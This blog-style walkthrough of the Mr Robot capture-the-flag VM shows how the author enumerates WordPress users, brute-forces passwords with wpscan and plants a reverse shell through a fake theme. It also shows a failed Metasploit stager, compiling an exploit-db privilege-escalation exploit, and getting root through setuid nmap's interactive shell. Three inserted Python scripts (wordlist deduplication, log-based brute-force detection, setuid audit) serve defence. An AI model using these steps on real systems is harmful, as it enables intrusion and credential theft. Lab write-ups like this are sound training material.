Mr Robot Walkthrough

George Chen
7 min read · Jun 18, 2019


link to vm

After finding the IP with netdiscover:

```
root@kali:~# ip=192.168.50.71
root@kali:~# nmap $ip -p- -sV --reason
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-28 08:59 EDT
Nmap scan report for linux (192.168.50.71)
Host is up, received arp-response (0.00069s latency).
Not shown: 65532 filtered ports
Reason: 65532 no-responses
PORT    STATE  SERVICE  REASON         VERSION
22/tcp  closed ssh      reset ttl 64
80/tcp  open   http     syn-ack ttl 64 Apache httpd
443/tcp open   ssl/http syn-ack ttl 64 Apache httpd
MAC Address: 00:0C:29:58:E1:95 (VMware)
```

Hitting port 80 presents us with a whoismrrobot.com CLI-styled landing page:

After requesting the “join” URI in my browser (actually any string after the root directory works), I reached the blog page, which is powered by WordPress.

WordPress version 4.3.19

Given the outdated WordPress version, I tried an msf exploit, which didn’t get me far:

```
msf > use exploit/unix/webapp/wp_phpmailer_host_header
msf exploit(unix/webapp/wp_phpmailer_host_header) > exploit
[*] Started HTTPS reverse handler on https://192.168.50.2:8443
[*] Generating wget command stager
[*] Using URL: http://0.0.0.0:8080/zgziwnzg
[*] Local IP: http://192.168.50.2:8080/zgziwnzg
[*] Generating and sending Exim prestager
[-] Exploit aborted due to failure: no-access: WordPress username may be incorrect
[*] Server stopped.
[*] Exploit completed, but no session was created.
```

I went on to do a deeper scan of the WordPress instance:

```
wpscan --url http://192.168.50.71/join --enumerate u
```

While that didn’t enumerate any usernames, it did show that a robots.txt was present:

```
User-agent: *
fsocity.dic
key-1-of-3.txt
```

fsocity.dic was a 7+ MB wordlist, which I obtained with wget. Key 1 of 3 was the string “073403c8a58a1f80d943455fb30724b9”.

I ran the wordlist against the server with wpscan, but it took forever. Taking a closer look, there were a ton of duplicated entries — 75 copies of each, to be exact.

```
awk '{for(w=1;w<=NF;w++) print $w}' ~/fsocity.dic | sort | uniq -c | sort -nr
```

Here are the entries that stood out:

```
150 123456Seven
  1 uHack
  1 psychedelic
  1 imhack
  1 iamalearn
  1 ER28-0652
  1 c3fcd3d76192e4007dfb496cca67e13b
  1 ABCDEFGHIJKLMNOPQRSTUVWXYZ
  1 abcdefghijklmnopq
  1 abcdEfghijklmnop
  1 abcdefghijklmno
```

(where c3fcd3d76192e4007dfb496cca67e13b is the MD5 hash of abcdefghijklmnopqrstuvwxyz)
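The awk/sort/uniq pipeline above does the counting in the shell. The following Python script is an added example, not the author's code: it performs the same deduplication and frequency count, reports entries whose count breaks the pattern (like 123456Seven above), and then goes one step further by checking whether any 32-hex-character entry is the MD5 of another entry in the same list, which is the relationship noted in the parenthetical. The wordlist below is a small constructed stand-in for fsocity.dic.

```python
import hashlib
import re
from collections import Counter

# Constructed mini wordlist standing in for fsocity.dic: a handful of entries
# repeated three times, one entry repeated twice as often, and one MD5 digest
# that another entry in the list hashes to.
SAMPLE_WORDLIST = (
    "true\nfalse\nwikia\nfrom\nthe\nnow\n"
    "abcdefghijklmnopqrstuvwxyz\nc3fcd3d76192e4007dfb496cca67e13b\n"
    "ER28-0652\n"
) * 3 + "123456Seven\n" * 6

MD5_RE = re.compile(r"^[0-9a-f]{32}$")


def count_entries(text):
    """Frequency of each whitespace-separated entry, like awk ... | sort | uniq -c."""
    return Counter(text.split())


def deduplicate(text):
    """Unique entries in first-seen order (sort | uniq would return them sorted)."""
    seen = set()
    unique = []
    for word in text.split():
        if word not in seen:
            seen.add(word)
            unique.append(word)
    return unique


def duplicate_factor(counts):
    """The repetition count shared by most entries (75 in the original list)."""
    return Counter(counts.values()).most_common(1)[0][0]


def stands_out(counts):
    """Entries whose count differs from the common duplicate factor."""
    factor = duplicate_factor(counts)
    return sorted(word for word, n in counts.items() if n != factor)


def match_hashes(words):
    """Map each MD5-looking entry to the entry in the same list that hashes to it (or None)."""
    digests = {hashlib.md5(w.encode()).hexdigest(): w for w in words}
    return {w: digests.get(w) for w in words if MD5_RE.match(w)}


if __name__ == "__main__":
    counts = count_entries(SAMPLE_WORDLIST)
    unique = deduplicate(SAMPLE_WORDLIST)
    print(f"{sum(counts.values())} entries, {len(unique)} unique, "
          f"most repeated {duplicate_factor(counts)} times")
    print("stand out:", stands_out(counts))
    print("hash matches:", match_hashes(unique))
```

Run it against the real file with `deduplicate(open("fsocity.dic").read())`; the hash cross-check is the part worth keeping, since a wordlist that contains both a digest and its preimage is a strong hint that the digest is a credential used elsewhere on the box.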

On the WordPress page, I noticed a resource that the page kept trying to load:

```
background-image: url('http://172.16.58.187/wp-content/uploads/2015/11/maxresdefault-1.jpg')
```

Accessing that locally, I retrieved a regular Mr Robot themed background with no other leads.

I continued to work on the wordlist and deduplicated it:

```
cat fsocity.dic | sort | uniq > fsocity.dic.txt
```

To enumerate usernames from WordPress, I couldn’t use wpscan, since that only brute-forces passwords from a wordlist. It probably had to be done more manually, so I inspected the network traffic to capture the different error messages returned by http://192.168.50.71/wp-login.php.

According to a HackerOne report, the information disclosure through the error message is intentional, to improve the user experience.

The response was rather hard to capture from this endpoint, so I went with the forgot-password form instead, which also validates the username. Great.

I fired up Burp Suite to capture the same request and response, sent it to Intruder, pasted in the deduplicated wordlist (since I’m on the Community edition), and let my machine do the work:

speed was painfully throttled in the Community edition

A username soon surfaced, and I validated it once more on wp-login.php, which prompted a different error message. Taking the username, I brute-forced the password with wpscan using the same wordlist and got a match within a minute and a half:

```
root@kali:~# wpscan --url http://192.168.50.71/wp-login.php --wordlist /root/fsocity.dic.txt --wp-content-dir http://192.168.50.71/wp-content --username elliot
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 2.9.4
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.50.71/wp-login.php/
[+] Started: Sun Jun  9 11:59:35 2019

[+] Interesting header: SERVER: Apache
[+] Interesting header: SET-COOKIE: wordpress_test_cookie=WP+Cookie+check; path=/
[+] Interesting header: X-FRAME-OPTIONS: SAMEORIGIN
[+] Interesting header: X-POWERED-BY: PHP/5.5.29
[+] robots.txt available under: http://192.168.50.71/wp-login.php/robots.txt [HTTP 200]
[+] humans.txt available under: http://192.168.50.71/wp-login.php/humans.txt [HTTP 200]
[+] security.txt available under: http://192.168.50.71/wp-login.php/.well-known/security.txt [HTTP 200]
[!] emergency.php has been found in: http://192.168.50.71/wp-login.php/emergency.php
[+] This site seems to be a multisite (http://codex.wordpress.org/Glossary#Multisite)

[+] Enumerating WordPress version ...

[i] WordPress version can not be detected

[+] Enumerating plugins from passive detection ...
[+] No plugins found passively

[+] Starting the password brute forcer
[+] [SUCCESS] Login : elliot Password : ER28-0652

  Brute Forcing 'elliot' Time: 00:01:31 <==================          > (5634 / 11452) 49.19%  ETA: 00:01:34
  +----+--------+------+-----------+
  | ID | Login  | Name | Password  |
  +----+--------+------+-----------+
  |    | elliot |      | ER28-0652 |
  +----+--------+------+-----------+

[+] Finished: Sun Jun  9 12:01:14 2019
[+] Elapsed time: 00:01:39
[+] Requests made: 6282
[+] Memory used: 6.547 MB
```

The password looked familiar, because I had flagged it earlier. Googling it, that number turned out to be Elliot’s employee ID. And I’m in!
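From the defender's side, both the username validation through the forgot-password form and the wpscan run that followed leave a distinctive trace in the web server's access log: a burst of POSTs to wp-login.php answered with HTTP 200 (the form re-rendered with an error), and, once the password is found, a 302 redirect from the same client. The following Python script is an added example, not part of the original post; it runs that detection over constructed Apache combined-format log lines. The threshold, the status-code interpretation and the sample traffic are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache combined log format; only the fields the detection needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def analyze_wp_login(lines, threshold=20):
    """Per source IP, count login failures and lost-password probes against wp-login.php.

    Assumption about WordPress behaviour: a failed login (or an unknown user in
    the lost-password form) re-renders the form with HTTP 200, while a
    successful login answers with a 302. A run of 200s followed by a 302 from
    the same client is therefore the signature of a brute force that found a
    valid password.
    """
    stats = defaultdict(lambda: {
        "failed_logins": 0, "lostpassword_probes": 0,
        "success_after_failures": False, "first": None, "last": None,
    })
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        path, _, query = rec["path"].partition("?")
        if path != "/wp-login.php":
            continue
        s = stats[rec["ip"]]
        s["first"] = s["first"] or rec["ts"]
        s["last"] = rec["ts"]
        if "action=lostpassword" in query:
            if rec["status"] == 200:          # unknown user: form re-rendered with the error
                s["lostpassword_probes"] += 1
        elif rec["status"] == 200:            # wrong credentials
            s["failed_logins"] += 1
        elif rec["status"] == 302 and s["failed_logins"] >= threshold:
            s["success_after_failures"] = True
    return dict(stats)


def alerts(lines, threshold=20):
    """Only the clients whose activity crosses the threshold, with their request rate."""
    out = {}
    for ip, s in analyze_wp_login(lines, threshold).items():
        if s["failed_logins"] >= threshold or s["lostpassword_probes"] >= threshold:
            span = max((s["last"] - s["first"]).total_seconds(), 1)
            total = s["failed_logins"] + s["lostpassword_probes"]
            out[ip] = dict(s, requests_per_second=round(total / span, 2))
    return out


def _line(ip, second, method, path, status):
    """Build one constructed log line (all sample traffic below is made up)."""
    return (f'{ip} - - [09/Jun/2019:11:59:{second:02d} -0400] '
            f'"{method} {path} HTTP/1.1" {status} 2048 "-" "Mozilla/5.0"')


# Constructed sample: 25 wrong passwords in 25 seconds and then a hit from one
# client, five lost-password probes from the same client, and one ordinary
# visitor who loads the form and logs in on the first try.
SAMPLE_LOG = (
    [_line("192.168.50.2", s, "POST", "/wp-login.php", 200) for s in range(25)]
    + [_line("192.168.50.2", 25, "POST", "/wp-login.php", 302)]
    + [_line("192.168.50.2", 26 + i, "POST", "/wp-login.php?action=lostpassword", 200) for i in range(5)]
    + [_line("10.0.0.5", 10, "GET", "/wp-login.php", 200),
       _line("10.0.0.5", 20, "POST", "/wp-login.php", 302)]
)

if __name__ == "__main__":
    for ip, s in alerts(SAMPLE_LOG).items():
        outcome = "success after failures" if s["success_after_failures"] else "no success"
        print(f"{ip}: {s['failed_logins']} failed logins, {s['lostpassword_probes']} "
              f"lost-password probes, {outcome} ({s['requests_per_second']} req/s)")
```

On the run shown above, wpscan made 6282 requests in 99 seconds; at that rate even a generous threshold fires within the first second, and the 302 that follows the failures is the line worth paging someone for.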

Exploring the different tabs, I found another user:

```
root@kali:~# wpscan --url http://192.168.50.71/wp-login.php --wordlist /root/fsocity.dic.txt --wp-content-dir http://192.168.50.71/wp-content --username mich05654
...
...
[+] Starting the password brute forcer
[+] [SUCCESS] Login : mich05654 Password : Dylan_2791

  Brute Forcing 'mich05654' Time: 00:01:26 <================            > (5365 / 11452) 46.84%  ETA: 00:01:38
  +----+-----------+------+------------+
  | ID | Login     | Name | Password   |
  +----+-----------+------+------------+
  |    | mich05654 |      | Dylan_2791 |
  +----+-----------+------+------------+
```

The above wasn’t too helpful, since that account only had regular subscriber privileges. I hopped back to the admin user. Searching Google for a reverse shell on WordPress, I came across options to upload a malicious plugin or theme. I found https://forum.top-hat-sec.com/index.php?topic=5758.0, which describes embedding a reverse shell in a fake theme, and went on to install that.

changing the listening address and port

While preview mode did not give me the reverse shell, activating the theme did:

beautiful!

Listing the directory, I see the file http://192.168.50.71/you-will-never-guess-this-file-name.txt, which reads “hello there person who found me.”.

Moving up a directory, I see the binary “updateip”, which requires sudo. Navigating to /home, I see the 2nd key:

```
robot:c3fcd3d76192e4007dfb496cca67e13b
```

I submitted the MD5 to http://cracker.offensive-security.com/index.php in the hope of finding the unhashed password, but no plaintext was found. Using another reverse lookup tool, https://md5.gromweb.com/?md5=c3fcd3d76192e4007dfb496cca67e13b, I found the plaintext to be a rather unoriginal “abcdefghijklmnopqrstuvwxyz” (it didn’t work as the sudo password anyway, probably because I didn’t have a full shell).

another interesting directory
some additional details from /etc/passwd

So I thought I should run a Linux privilege-escalation checker first. From http://192.168.50.71/wp-admin/themes.php, I uploaded the script from https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py and gave it a run:

```
[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...

    Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!

    The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system
    - MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c

    The following exploits are applicable to this kernel version and should be investigated as well
    - Kernel ia32syscall Emulation Privilege Escalation || http://www.exploit-db.com/exploits/15023 || Language=c
    - Sendpage Local Privilege Escalation || http://www.exploit-db.com/exploits/19933 || Language=ruby**
    - CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || http://www.exploit-db.com/exploits/15944 || Language=c
    - CAP_SYS_ADMIN to root Exploit || http://www.exploit-db.com/exploits/15916 || Language=c
    - MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
    - open-time Capability file_ns_capable() Privilege Escalation || http://www.exploit-db.com/exploits/25450 || Language=c
    - open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/25307 || Language=c
```

I also saw that /tmp is world-writable, so I fetched https://www.exploit-db.com/raw/37292 with wget and compiled it, but it failed to escalate:

```
$ gcc ofs.c -o ofs
$ ./ofs
spawning threads
mount #1
mount #2
child threads done
exploit failed
$
```

The rest of the exploits listed above didn’t work either. Manual work then. Going through https://payatu.com/guide-linux-privilege-escalation/, I found a lead:

```
$ find / -perm -u=s -type f 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown

$ /usr/local/bin/nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
id
uid=1(daemon) gid=1(daemon) euid=0(root) groups=0(root),1(daemon)
cat /home/robot/key-2-of-3.txt
822c73956184f694993bede3eb39f959
find / -name "key-3-of-3.txt"
/root/key-3-of-3.txt
cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
```
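The find command above is the attacker's view of the setuid inventory; the same enumeration is what a host audit should run on a schedule, with the result compared against a baseline so that a hand-installed setuid binary under /usr/local (exactly where this nmap sat) is flagged the day it appears. The following Python script is an added example, not part of the original post. It walks the filesystem for setuid/setgid files and classifies them against an assumed baseline of stock Debian/Ubuntu setuid binaries; the baseline, the "hand-installed" prefixes and the sample input (the list shown above, reused as constructed data) are all assumptions to tune for your own image.

```python
import os
import stat
import sys

# Setuid binaries a stock Debian/Ubuntu install of that era ships with.
# Assumption: trim or extend this to match your own golden image.
BASELINE = {
    "/bin/ping", "/bin/ping6", "/bin/mount", "/bin/umount", "/bin/su",
    "/usr/bin/passwd", "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/sudo",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/pt_chown",
}

# Locations the package manager does not own: a setuid file here was put there by hand.
HAND_INSTALLED_PREFIXES = ("/usr/local/", "/opt/", "/home/", "/tmp/", "/var/tmp/", "/dev/shm/")

# Pseudo filesystems that are pointless (and slow) to walk.
PSEUDO_FS = {"/proc", "/sys", "/dev", "/run"}


def find_suid_files(root="/"):
    """Walk the filesystem and return every regular file with the setuid or setgid bit set."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in PSEUDO_FS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                found.append(path)
    return sorted(found)


def audit_suid(paths, baseline=BASELINE):
    """Split setuid paths into expected (in baseline), unexpected, and hand-installed."""
    report = {"expected": [], "unexpected": [], "hand_installed": []}
    for path in paths:
        if path in baseline:
            report["expected"].append(path)
            continue
        report["unexpected"].append(path)
        if path.startswith(HAND_INSTALLED_PREFIXES):
            report["hand_installed"].append(path)
    return report


# Constructed sample input: the setuid list the walkthrough found on the VM.
SAMPLE_PATHS = [
    "/bin/ping", "/bin/umount", "/bin/mount", "/bin/ping6", "/bin/su",
    "/usr/bin/passwd", "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/sudo", "/usr/local/bin/nmap",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper",
    "/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper",
    "/usr/lib/pt_chown",
]

if __name__ == "__main__":
    # With a directory argument the live filesystem is scanned; otherwise the sample list is used.
    paths = find_suid_files(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_PATHS
    report = audit_suid(paths)
    for path in report["unexpected"]:
        tag = "HAND-INSTALLED" if path in report["hand_installed"] else "unexpected"
        print(f"[{tag}] {path}")
    print(f"{len(report['expected'])} expected, {len(report['unexpected'])} unexpected")
```

The VMware wrappers show up as unexpected only because the assumed baseline is a bare OS image; on a VM fleet they belong in the baseline, which is the point of keeping the baseline per image rather than using a global one. The nmap binary under /usr/local is the kind of finding the audit exists for: nothing in the package database put it there, and an old setuid copy of a tool that can spawn a shell is a root escalation waiting to be found.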

Piecing the keys together, we get 073403c8a58a1f80d943455fb30724b9822c73956184f694993bede3eb39f95904787ddef27c3dee1ee161b21670b4e4!

Written by George Chen

George is the Head of CloudSec and AppSec at Dyson. He's passionate about cyber innovation and has filed over 50 cybersecurity patents.
